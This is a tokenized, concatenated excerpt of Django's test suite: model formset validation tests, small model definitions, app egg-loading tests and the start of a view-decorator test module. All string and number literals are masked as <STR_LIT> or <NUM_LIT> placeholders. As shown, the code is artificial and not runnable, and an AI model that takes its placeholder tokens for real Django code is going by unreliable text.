create ( name = '<STR_LIT>' ) <EOL> formset = PoemFormSet ( data = data , instance = poet ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:2> ) <EOL> poem1 , poem2 = saved <EOL> self . assertEqual ( poem1 . name , '<STR_LIT>' ) <EOL> self . assertEqual ( poem2 . name , '<STR_LIT>' ) <EOL> custom_qs = Book . objects . order_by ( '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet ( instance = author , queryset = custom_qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:5> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:3> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:4> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:5>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( book1 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( book2 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( book3 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet ( data , instance = author , queryset = custom_qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> custom_qs = Book . objects . filter ( title__startswith = '<STR_LIT:F>' ) <EOL> formset = AuthorBooksFormSet ( instance = author , queryset = custom_qs ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . 
assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( book3 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet ( data , instance = author , queryset = custom_qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> def test_custom_pk ( self ) : <EOL> CustomPrimaryKeyFormSet = modelformset_factory ( CustomPrimaryKey ) <EOL> formset = CustomPrimaryKeyFormSet ( ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:1> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> place = Place . objects . create ( pk = <NUM_LIT:1> , name = '<STR_LIT>' , city = '<STR_LIT>' ) <EOL> FormSet = inlineformset_factory ( Place , Owner , extra = <NUM_LIT:2> , can_delete = False ) <EOL> formset = FormSet ( instance = place ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:2> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data , instance = place ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> owner1 , = saved <EOL> self . assertEqual ( owner1 . name , '<STR_LIT>' ) <EOL> self . assertEqual ( owner1 . place . name , '<STR_LIT>' ) <EOL> formset = FormSet ( instance = place ) <EOL> self . 
assertEqual ( len ( formset . forms ) , <NUM_LIT:3> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> % owner1 . auto_id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : six . text_type ( owner1 . auto_id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data , instance = place ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> owner2 , = saved <EOL> self . assertEqual ( owner2 . name , '<STR_LIT>' ) <EOL> self . assertEqual ( owner2 . place . name , '<STR_LIT>' ) <EOL> FormSet = modelformset_factory ( OwnerProfile ) <EOL> formset = FormSet ( ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( owner1 . auto_id , owner2 . auto_id ) ) <EOL> owner1 = Owner . objects . get ( name = '<STR_LIT>' ) <EOL> FormSet = inlineformset_factory ( Owner , OwnerProfile , max_num = <NUM_LIT:1> , can_delete = False ) <EOL> self . assertEqual ( FormSet . max_num , <NUM_LIT:1> ) <EOL> formset = FormSet ( instance = owner1 ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:1> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> % owner1 . 
# NOTE(review): literals in this excerpt are masked by a tokenization pass
# (<STR_LIT>/<NUM_LIT> placeholders), so comments below describe structure only.
# This span is the interior of a model-formset TestCase whose class header lies
# before this chunk; the opening lines below are the tail of a test method that
# also begins before this chunk, preserved verbatim.
            auto_id)
        # Submit one extra form bound to `owner1`; saving must yield exactly
        # one new profile attached to that owner.
        data = {
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        }
        formset = FormSet(data, instance=owner1)
        self.assertTrue(formset.is_valid())
        saved = formset.save()
        self.assertEqual(len(saved), <NUM_LIT:1>)
        profile1, = saved
        self.assertEqual(profile1.owner, owner1)
        self.assertEqual(profile1.age, <NUM_LIT>)
        # Re-render unbound: the existing profile should pre-populate one form.
        formset = FormSet(instance=owner1)
        self.assertEqual(len(formset.forms), <NUM_LIT:1>)
        self.assertHTMLEqual(formset.forms[<NUM_LIT:0>].as_p(),
            '<STR_LIT>'
            % owner1.auto_id)
        # Resubmit with an initial-form count of one to update (not create).
        data = {
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': six.text_type(owner1.auto_id),
            '<STR_LIT>': '<STR_LIT>',
        }
        formset = FormSet(data, instance=owner1)
        self.assertTrue(formset.is_valid())
        saved = formset.save()
        self.assertEqual(len(saved), <NUM_LIT:1>)
        profile1, = saved
        self.assertEqual(profile1.owner, owner1)
        self.assertEqual(profile1.age, <NUM_LIT>)

    def test_unique_true_enforces_max_num_one(self):
        # A unique FK on the inline model caps the formset at a single form.
        place = Place.objects.create(pk=<NUM_LIT:1>, name='<STR_LIT>', city='<STR_LIT>')
        FormSet = inlineformset_factory(Place, Location, can_delete=False)
        self.assertEqual(FormSet.max_num, <NUM_LIT:1>)
        formset = FormSet(instance=place)
        self.assertEqual(len(formset.forms), <NUM_LIT:1>)
        self.assertHTMLEqual(formset.forms[<NUM_LIT:0>].as_p(),
            '<STR_LIT>'
            '<STR_LIT>')

    def test_foreign_keys_in_parents(self):
        # _get_foreign_key must locate the FK even when it is declared on a
        # parent model (Restaurant) of the child (MexicanRestaurant).
        self.assertEqual(type(_get_foreign_key(Restaurant, Owner)), models.ForeignKey)
        self.assertEqual(type(_get_foreign_key(MexicanRestaurant, Owner)), models.ForeignKey)

    def test_unique_validation(self):
        # First submission saves; a duplicate slug is rejected with a
        # per-form uniqueness error.
        FormSet = modelformset_factory(Product, extra=<NUM_LIT:1>)
        data = {
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        }
        formset = FormSet(data)
        self.assertTrue(formset.is_valid())
        saved = formset.save()
        self.assertEqual(len(saved), <NUM_LIT:1>)
        product1, = saved
        self.assertEqual(product1.slug, '<STR_LIT>')
        data = {
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        }
        formset = FormSet(data)
        self.assertFalse(formset.is_valid())
        self.assertEqual(formset.errors, [{'<STR_LIT>': ['<STR_LIT>']}])

    def test_unique_together_validation(self):
        # unique_together on Price (presumably price+quantity — masked here)
        # must reject a second identical row.
        FormSet = modelformset_factory(Price, extra=<NUM_LIT:1>)
        data = {
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT:1>',
        }
        formset = FormSet(data)
        self.assertTrue(formset.is_valid())
        saved = formset.save()
        self.assertEqual(len(saved), <NUM_LIT:1>)
        price1, = saved
        self.assertEqual(price1.price, Decimal('<STR_LIT>'))
        self.assertEqual(price1.quantity, <NUM_LIT:1>)
        data = {
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT:1>',
        }
        formset = FormSet(data)
        self.assertFalse(formset.is_valid())
        self.assertEqual(formset.errors, [{'<STR_LIT>': ['<STR_LIT>']}])

    def test_unique_together_with_inlineformset_factory(self):
        # Same unique_together check, but through an inline formset where one
        # member of the constraint is the inline FK itself.
        repository = Repository.objects.create(name='<STR_LIT>')
        FormSet = inlineformset_factory(Repository, Revision, extra=<NUM_LIT:1>)
        data = {
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': repository.pk,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        }
        formset = FormSet(data, instance=repository)
        self.assertTrue(formset.is_valid())
        saved = formset.save()
        self.assertEqual(len(saved), <NUM_LIT:1>)
        revision1, = saved
        self.assertEqual(revision1.repository, repository)
        self.assertEqual(revision1.revision, '<STR_LIT>')
        data = {
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': repository.pk,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        }
        formset = FormSet(data, instance=repository)
        self.assertFalse(formset.is_valid())
        self.assertEqual(formset.errors, [{'<STR_LIT>': ['<STR_LIT>']}])
        # The constraint must still apply when the FK field is excluded from
        # the rendered fields.
        FormSet = inlineformset_factory(Repository, Revision, fields=('<STR_LIT>',), extra=<NUM_LIT:1>)
        data = {
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': repository.pk,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        }
        formset = FormSet(data, instance=repository)
        self.assertFalse(formset.is_valid())

    def test_callable_defaults(self):
        # A callable field default (a "now"-style timestamp, judging by the
        # strftime/timedelta usage — masked here) must render as the initial
        # value and round-trip through validation unchanged.
        person = Person.objects.create(name='<STR_LIT>')
        FormSet = inlineformset_factory(Person, Membership, can_delete=False, extra=<NUM_LIT:1>)
        formset = FormSet(instance=person)
        self.assertEqual(len(formset.forms), <NUM_LIT:1>)
        form = formset.forms[<NUM_LIT:0>]
        now = form.fields['<STR_LIT>'].initial()
        result = form.as_p()
        # Normalize the volatile timestamp out of the rendered HTML before
        # comparing against the fixed expected markup.
        result = re.sub(r'<STR_LIT>', '<STR_LIT>', result)
        self.assertHTMLEqual(result,
            '<STR_LIT>'
            '<STR_LIT>'
            % person.id)
        data = {
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': six.text_type(now.strftime('<STR_LIT>')),
            '<STR_LIT>': six.text_type(now.strftime('<STR_LIT>')),
            '<STR_LIT>': '<STR_LIT>',
        }
        formset = FormSet(data, instance=person)
        self.assertTrue(formset.is_valid())
        # Shifting the hidden-initial value by a day must trip the
        # changed-data/validation check.
        one_day_later = now + datetime.timedelta(days=<NUM_LIT:1>)
        filled_data = {
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': six.text_type(one_day_later.strftime('<STR_LIT>')),
            '<STR_LIT>': six.text_type(now.strftime('<STR_LIT>')),
            '<STR_LIT>': '<STR_LIT>',
        }
        formset = FormSet(filled_data, instance=person)
        self.assertFalse(formset.is_valid())

        # Repeat with a custom form that swaps in a split date/time widget,
        # so the same field posts as two components.
        class MembershipForm(forms.ModelForm):
            date_joined = forms.SplitDateTimeField(initial=now)

            class Meta:
                model = Membership

            def __init__(self, **kwargs):
                super(MembershipForm, self).__init__(**kwargs)
                self.fields['<STR_LIT>'].widget = forms.SplitDateTimeWidget()

        FormSet = inlineformset_factory(Person, Membership, form=MembershipForm, can_delete=False, extra=<NUM_LIT:1>)
        data = {
            '<STR_LIT>': '<STR_LIT:1>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': six.text_type(now.strftime('<STR_LIT>')),
            '<STR_LIT>': six.text_type(now.strftime('<STR_LIT>')),
            '<STR_LIT>': six.text_type(now.strftime('<STR_LIT>')),
            '<STR_LIT>': '<STR_LIT>',
        }
        formset = FormSet(data, instance=person)
        self.assertTrue(formset.is_valid())

    def test_inlineformset_factory_with_null_fk(self):
        # An inline formset over a nullable FK must exclude rows whose FK is
        # NULL from the queryset for a given parent instance.
        team = Team.objects.create(name="<STR_LIT>")
        Player(name="<STR_LIT>").save()
        Player(name="<STR_LIT>", team=team).save()
        PlayerInlineFormSet = inlineformset_factory(Team, Player)
        formset = PlayerInlineFormSet()
        self.assertQuerysetEqual(formset.get_queryset(), [])
        formset = PlayerInlineFormSet(instance=team)
        players = formset.get_queryset()
        self.assertEqual(len(players), <NUM_LIT:1>)
        player1, = players
        self.assertEqual(player1.team, team)
        self.assertEqual(player1.name, '<STR_LIT>')

    def test_model_formset_with_custom_pk(self):
        # A model with a custom primary key still exposes the pk field on the
        # generated form alongside the requested field.
        FormSet = modelformset_factory(ClassyMexicanRestaurant, fields=["<STR_LIT>"])
        self.assertEqual(sorted(FormSet().forms[<NUM_LIT:0>].fields.keys()), ['<STR_LIT>', '<STR_LIT>'])

    def test_prevent_duplicates_from_with_the_same_formset(self):
        # Duplicate rows submitted within ONE formset must be caught as
        # non-form errors (plain unique, unique_together, unique_together
        # involving the inline FK, and unique_for_date-style checks in turn).
        FormSet = modelformset_factory(Product, extra=<NUM_LIT:2>)
        data = {
            '<STR_LIT>': <NUM_LIT:2>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        }
        formset = FormSet(data)
        self.assertFalse(formset.is_valid())
        self.assertEqual(formset._non_form_errors,
            ['<STR_LIT>'])
        FormSet = modelformset_factory(Price, extra=<NUM_LIT:2>)
        data = {
            '<STR_LIT>': <NUM_LIT:2>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        }
        formset = FormSet(data)
        self.assertFalse(formset.is_valid())
        self.assertEqual(formset._non_form_errors,
            ['<STR_LIT>'])
        # Restricting the rendered fields to only part of the constraint
        # disables the duplicate check.
        FormSet = modelformset_factory(Price, fields=("<STR_LIT>",), extra=<NUM_LIT:2>)
        data = {
            '<STR_LIT>': '<STR_LIT:2>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        }
        formset = FormSet(data)
        self.assertTrue(formset.is_valid())
        # Inline variant: the duplicate is between two existing rows edited
        # to collide on the (FK, field) pair.
        FormSet = inlineformset_factory(Author, Book, extra=<NUM_LIT:0>)
        author = Author.objects.create(pk=<NUM_LIT:1>, name='<STR_LIT>')
        book1 = Book.objects.create(pk=<NUM_LIT:1>, author=author, title='<STR_LIT>')
        book2 = Book.objects.create(pk=<NUM_LIT:2>, author=author, title='<STR_LIT>')
        book3 = Book.objects.create(pk=<NUM_LIT:3>, author=author, title='<STR_LIT>')
        book_ids = author.book_set.order_by('<STR_LIT:id>').values_list('<STR_LIT:id>', flat=True)
        data = {
            '<STR_LIT>': '<STR_LIT:2>',
            '<STR_LIT>': '<STR_LIT:2>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': str(author.id),
            '<STR_LIT>': str(book_ids[<NUM_LIT:0>]),
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': str(author.id),
            '<STR_LIT>': str(book_ids[<NUM_LIT:1>]),
        }
        formset = FormSet(data=data, instance=author)
        self.assertFalse(formset.is_valid())
        self.assertEqual(formset._non_form_errors,
            ['<STR_LIT>'])
        self.assertEqual(formset.errors,
            [{}, {'<STR_LIT>': ['<STR_LIT>']}])
        # Date-scoped uniqueness (unique_for_date family, by the shape of the
        # assertions — masked here) across forms in the same formset.
        FormSet = modelformset_factory(Post, extra=<NUM_LIT:2>)
        data = {
            '<STR_LIT>': '<STR_LIT:2>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT:foo>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>'
        }
        formset = FormSet(data)
        self.assertFalse(formset.is_valid())
        self.assertEqual(formset._non_form_errors,
            ['<STR_LIT>'])
        self.assertEqual(formset.errors,
            [{}, {'<STR_LIT>': ['<STR_LIT>']}])
        data = {
            '<STR_LIT>': '<STR_LIT:2>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT:foo>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT:foo>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>'
        }
        formset = FormSet(data)
        self.assertFalse(formset.is_valid())
        self.assertEqual(formset._non_form_errors,
            ['<STR_LIT>'])
        data = {
            '<STR_LIT>': '<STR_LIT:2>',
            '<STR_LIT>': '<STR_LIT:0>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT:foo>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>'
        }
        formset = FormSet(data)
        self.assertFalse(formset.is_valid())
        self.assertEqual(formset._non_form_errors,
            ['<STR_LIT>'])
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> from django . utils . encoding import python_2_unicode_compatible <EOL> class Article ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> pub_date = models . DateTimeField ( ) <EOL> def __str__ ( self ) : <EOL> return self . headline <EOL> @ python_2_unicode_compatible <EOL> class BrokenArticle ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> pub_date = models . DateTimeField ( ) <EOL> def __unicode__ ( self ) : <EOL> return self . headline <EOL> @ python_2_unicode_compatible <EOL> class InternationalArticle ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> pub_date = models . DateTimeField ( ) <EOL> def __str__ ( self ) : <EOL> return self . headline </s>
# NOTE(review): literals in this module are masked by a tokenization pass
# (<STR_LIT>/<NUM_LIT> placeholders); comments describe structure only.
# Fixture models (Book/Department/Employee) — presumably for admin
# list-filter tests, given the verbose_name/to_field coverage; confirm
# against the importing test module.
from __future__ import unicode_literals

from django.contrib.auth.models import User
from django.db import models
from django.utils.encoding import python_2_unicode_compatible


@python_2_unicode_compatible
class Book(models.Model):
    title = models.CharField(max_length=<NUM_LIT:50>)
    year = models.PositiveIntegerField(null=True, blank=True)
    # Both a nullable FK and an M2M to User, each with an explicit
    # verbose_name and related_name.
    author = models.ForeignKey(User, verbose_name="<STR_LIT>", related_name='<STR_LIT>', blank=True, null=True)
    contributors = models.ManyToManyField(User, verbose_name="<STR_LIT>", related_name='<STR_LIT>', blank=True, null=True)
    is_best_seller = models.NullBooleanField(default=<NUM_LIT:0>)
    date_registered = models.DateField(null=True)
    # Field whose attribute name shadows nothing but carries a custom
    # verbose_name (masked).
    no = models.IntegerField(verbose_name='<STR_LIT>', blank=True, null=True)

    def __str__(self):
        return self.title


@python_2_unicode_compatible
class Department(models.Model):
    code = models.CharField(max_length=<NUM_LIT:4>, unique=True)
    description = models.CharField(max_length=<NUM_LIT:50>, blank=True, null=True)

    def __str__(self):
        return self.description


@python_2_unicode_compatible
class Employee(models.Model):
    # FK targeting a non-pk unique column via to_field.
    department = models.ForeignKey(Department, to_field="<STR_LIT:code>")
    name = models.CharField(max_length=<NUM_LIT:100>)

    def __str__(self):
        return self.name
# NOTE(review): literals in this module are masked by a tokenization pass
# (<STR_LIT>/<NUM_LIT> placeholders); comments describe structure only.
# Tests for Django's (old) app-loading machinery: loading model modules out
# of zipped eggs, and get_model/get_models behavior for apps that are not in
# INSTALLED_APPS.
from __future__ import absolute_import

import copy
import os
import sys
import time

from django.conf import Settings
from django.db.models.loading import cache, load_app, get_model, get_models
from django.utils.unittest import TestCase
from django.utils._os import upath


class EggLoadingTest(TestCase):

    def setUp(self):
        # Snapshot sys.path and the global app cache so each test's
        # load_app() side effects can be rolled back in tearDown.
        self.old_path = sys.path[:]
        self.egg_dir = '<STR_LIT>' % os.path.dirname(upath(__file__))
        self.old_app_models = copy.deepcopy(cache.app_models)
        self.old_app_store = copy.deepcopy(cache.app_store)

    def tearDown(self):
        # Restore the pre-test sys.path and app cache.
        sys.path = self.old_path
        cache.app_models = self.old_app_models
        cache.app_store = self.old_app_store

    def test_egg1(self):
        """<STR_LIT>"""
        # Egg layouts where load_app is expected to find a models module.
        egg_name = '<STR_LIT>' % self.egg_dir
        sys.path.append(egg_name)
        models = load_app('<STR_LIT>')
        self.assertFalse(models is None)

    def test_egg2(self):
        """<STR_LIT>"""
        # Egg layout with no models module: load_app returns None.
        egg_name = '<STR_LIT>' % self.egg_dir
        sys.path.append(egg_name)
        models = load_app('<STR_LIT>')
        self.assertTrue(models is None)

    def test_egg3(self):
        """<STR_LIT>"""
        egg_name = '<STR_LIT>' % self.egg_dir
        sys.path.append(egg_name)
        models = load_app('<STR_LIT>')
        self.assertFalse(models is None)

    def test_egg4(self):
        """<STR_LIT>"""
        egg_name = '<STR_LIT>' % self.egg_dir
        sys.path.append(egg_name)
        models = load_app('<STR_LIT>')
        self.assertTrue(models is None)

    def test_egg5(self):
        """<STR_LIT>"""
        # A broken egg must raise ImportError, and the error message must
        # contain the expected (masked) substring.
        egg_name = '<STR_LIT>' % self.egg_dir
        sys.path.append(egg_name)
        self.assertRaises(ImportError, load_app, '<STR_LIT>')
        try:
            load_app('<STR_LIT>')
        except ImportError as e:
            self.assertTrue("<STR_LIT>" in e.args[<NUM_LIT:0>])


class GetModelsTest(TestCase):
    def setUp(self):
        # A sibling package that is intentionally NOT in INSTALLED_APPS.
        from .not_installed import models
        self.not_installed_module = models

    def test_get_model_only_returns_installed_models(self):
        self.assertEqual(
            get_model("<STR_LIT>", "<STR_LIT>"), None)

    def test_get_model_with_not_installed(self):
        # only_installed=False widens the lookup to uninstalled apps.
        self.assertEqual(
            get_model(
                "<STR_LIT>", "<STR_LIT>", only_installed=False),
            self.not_installed_module.NotInstalledModel)

    def test_get_models_only_returns_installed_models(self):
        self.assertFalse(
            "<STR_LIT>" in
            [m.__name__ for m in get_models()])

    def test_get_models_with_app_label_only_returns_installed_models(self):
        self.assertEqual(get_models(self.not_installed_module), [])

    def test_get_models_with_not_installed(self):
        self.assertTrue(
            "<STR_LIT>" in [
                m.__name__ for m in get_models(only_installed=False)])


class NotInstalledModelsTest(TestCase):
    def test_related_not_installed_model(self):
        # Reverse relations into an uninstalled model must still register on
        # its _meta field names.
        from .not_installed.models import NotInstalledModel
        self.assertEqual(
            set(NotInstalledModel._meta.get_all_field_names()),
            set(["<STR_LIT:id>", "<STR_LIT>", "<STR_LIT>"]))
# NOTE(review): literals in this module are masked by a tokenization pass
# (<STR_LIT>/<NUM_LIT> placeholders); comments describe structure only.
# Tests for Django's view decorators: attribute preservation through a stack
# of every stock decorator, method_decorator, cache_page calling styles,
# require_safe, and the X-Frame-Options decorators.
import warnings
from functools import wraps

from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth.decorators import login_required, permission_required, user_passes_test
from django.http import HttpResponse, HttpRequest, HttpResponseNotAllowed
from django.middleware.clickjacking import XFrameOptionsMiddleware
from django.utils.decorators import method_decorator
from django.utils.functional import allow_lazy, lazy, memoize
from django.utils.unittest import TestCase
from django.views.decorators.cache import cache_page, never_cache, cache_control
from django.views.decorators.clickjacking import xframe_options_deny, xframe_options_sameorigin, xframe_options_exempt
from django.views.decorators.http import require_http_methods, require_GET, require_POST, require_safe, condition
from django.views.decorators.vary import vary_on_headers, vary_on_cookie


def fully_decorated(request):
    """<STR_LIT>"""
    # Baseline view; every stock decorator is applied to it below and
    # test_attributes checks __name__/__doc__/__dict__ survive the stack.
    return HttpResponse('<STR_LIT>')
fully_decorated.anything = "<STR_LIT>"


def compose(*functions):
    # Right-to-left function composition: compose(f, g)(x) == f(g(x)).
    functions = list(reversed(functions))

    def _inner(*args, **kwargs):
        result = functions[<NUM_LIT:0>](*args, **kwargs)
        for f in functions[<NUM_LIT:1>:]:
            result = f(result)
        return result
    return _inner

# One instance of every decorator shipped with Django, stacked.
full_decorator = compose(
    # django.views.decorators.http
    require_http_methods(["<STR_LIT:GET>"]),
    require_GET,
    require_POST,
    require_safe,
    condition(lambda r: None, lambda r: None),
    # django.views.decorators.vary
    vary_on_headers('<STR_LIT>'),
    vary_on_cookie,
    # django.views.decorators.cache
    cache_page(<NUM_LIT> * <NUM_LIT:15>),
    cache_control(private=True),
    never_cache,
    # django.contrib.auth.decorators
    user_passes_test(lambda u: True),
    login_required,
    permission_required('<STR_LIT>'),
    # django.contrib.admin.views.decorators
    staff_member_required,
    # django.utils.functional
    lambda f: memoize(f, {}, <NUM_LIT:1>),
    allow_lazy,
    lazy,
)

fully_decorated = full_decorator(fully_decorated)


class DecoratorsTest(TestCase):

    def test_attributes(self):
        """<STR_LIT>"""
